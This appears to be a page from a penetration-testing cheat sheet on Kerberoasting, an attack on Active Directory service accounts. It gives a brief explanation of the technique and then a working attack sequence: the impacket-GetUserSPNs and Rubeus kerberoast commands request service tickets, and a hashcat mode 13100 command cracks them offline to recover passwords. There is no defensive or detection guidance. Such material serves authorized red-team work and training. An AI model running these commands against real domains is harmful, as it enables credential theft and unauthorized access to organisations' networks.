Kerberoasting

Introduction

Kerberoasting is an attack technique that allows attackers to target service accounts in Active Directory. These service accounts typically have SPNs (Service Principal Names) associated with them.

The attacker is able to request the Service Ticket from the Ticket Granting Server which is encrypted using the SPN's password hash.

The attack is made in few steps:

The attacker sends TGS-REQ request to the Ticket Granting Server.
The attacker gets the Service Ticket in theTGS-REP request
Attacker brute-forces the Service Ticket offline to obtain the user's password.

Performing the attack

Impacket

impacket-GetUserSPNs -request -dc-ip <dc_ip> <domain>/<username>

Rubeus

.\Rubeus.exe kerberoast /outfile:<outputfile>

Crack

hashcat -m 13100 <hashes_file> <wordlist>

PreviousAS-REP Roasting NextPassword Spray

Last updated 1 year ago

hashtagIntroduction

hashtagPerforming the attack

hashtagImpacket

hashtagRubeus

hashtagCrack

Introduction

Performing the attack

Impacket

Rubeus

Crack